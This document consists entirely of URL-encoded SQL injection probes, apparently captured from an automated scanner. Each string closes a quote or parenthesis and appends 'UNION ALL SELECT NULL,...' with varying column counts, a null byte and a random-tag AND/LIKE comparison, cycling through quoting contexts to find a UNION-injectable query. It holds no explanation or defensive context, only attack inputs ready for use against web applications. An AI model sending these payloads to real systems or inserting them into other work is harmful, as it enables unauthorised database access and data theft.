1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27LaWu%27%20LIKE%20%27LaWu 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27UCsp%27%20LIKE%20%27UCsp 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27hpeL%27%20LIKE%20%27hpeL 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27eJoo%27%20LIKE%20%27eJoo 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22OHXS%22%3D%22OHXS 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22yYUn%22%3D%22yYUn 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22OdSQ%22%3D%22OdSQ 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22EyMt%22%3D%22EyMt 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22pCCc%22%3D%22pCCc 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22HvZG%22%3D%22HvZG 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22cPHm%22%3D%22cPHm 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22LqzH%22%3D%22LqzH 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22PBJM%22%3D%22PBJM 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22VrdC%22%3D%22VrdC 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22iBCN%22%3D%22iBCN 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22SbTH%22%3D%22SbTH 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22evTe%22%3D%22evTe 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22PNGl%22%3D%22PNGl 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22AuBR%22%3D%22AuBR 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22hkxU%22%3D%22hkxU 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22jEkU%22%3D%22jEkU 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22uhMU%22%3D%22uhMU 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22Mlqr%22%3D%22Mlqr 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22TTLj%22%3D%22TTLj 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22MYTx%22%3D%22MYTx 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22tufQ%22%3D%22tufQ 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22DzQy%22%3D%22DzQy 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22RShZ%22%3D%22RShZ 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22mvoQ%22%3D%22mvoQ 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22zFFc%22%3D%22zFFc 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22PZQz%22%3D%22PZQz 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22wqee%22%3D%22wqee 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22XSmB%22%3D%22XSmB 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22jNAY%22%3D%22jNAY 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22ZnNN%22%3D%22ZnNN 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22avkz%22%3D%22avkz 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22SDqB%22%3D%22SDqB 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22bgnn%22%3D%22bgnn 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22hhyV%22%3D%22hhyV 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22LkAc%22%3D%22LkAc 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22acuE%22%3D%22acuE 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22OwuW%22%3D%22OwuW 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22nncc%22%3D%22nncc 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22CfHp%22%3D%22CfHp 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22yHCf%22%20LIKE%20%22yHCf 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22DILO%22%20LIKE%20%22DILO 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22RYTk%22%20LIKE%20%22RYTk 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22TEYa%22%20LIKE%20%22TEYa 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22nuJv%22%20LIKE%20%22nuJv 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22LJTQ%22%20LIKE%20%22LJTQ 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22aizz%22%20LIKE%20%22aizz 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22soTR%22%20LIKE%20%22soTR 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22wSym%22%20LIKE%20%22wSym 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22DexF%22%20LIKE%20%22DexF 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22mqjY%22%20LIKE%20%22mqjY 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22TTfR%22%20LIKE%20%22TTfR 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22jgZS%22%20LIKE%20%22jgZS 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22fOJR%22%20LIKE%20%22fOJR 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22gLnY%22%20LIKE%20%22gLnY 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22AAGO%22%20LIKE%20%22AAGO 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22oxHL%22%20LIKE%20%22oxHL 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22Zlgj%22%20LIKE%20%22Zlgj 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22bfgs%22%20LIKE%20%22bfgs 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22cyXY%22%20LIKE%20%22cyXY 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22dEbM%22%20LIKE%20%22dEbM 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22SeSe%22%20LIKE%20%22SeSe 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22UJlA%22%20LIKE%20%22UJlA 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22mSno%22%20LIKE%20%22mSno 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22utGg%22%20LIKE%20%22utGg 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22ImuG%22%20LIKE%20%22ImuG 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22Greu%22%20LIKE%20%22Greu 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22nUXe%22%20LIKE%20%22nUXe 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22dEIG%22%20LIKE%20%22dEIG 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22oobk%22%20LIKE%20%22oobk 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22bvkG%22%20LIKE%20%22bvkG 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22GErO%22%20LIKE%20%22GErO 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22imff%22%20LIKE%20%22imff 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22hkPe%22%20LIKE%20%22hkPe 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22UZWV%22%20LIKE%20%22UZWV 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22RGIE%22%20LIKE%20%22RGIE 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22hlAN%22%20LIKE%20%22hlAN 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22ohXH%22%20LIKE%20%22ohXH 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22Hybb%22%20LIKE%20%22Hybb 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22PISj%22%20LIKE%20%22PISj 1%29%20WHERE%201964%3D1964%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%29%20WHERE%206947%3D6947%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 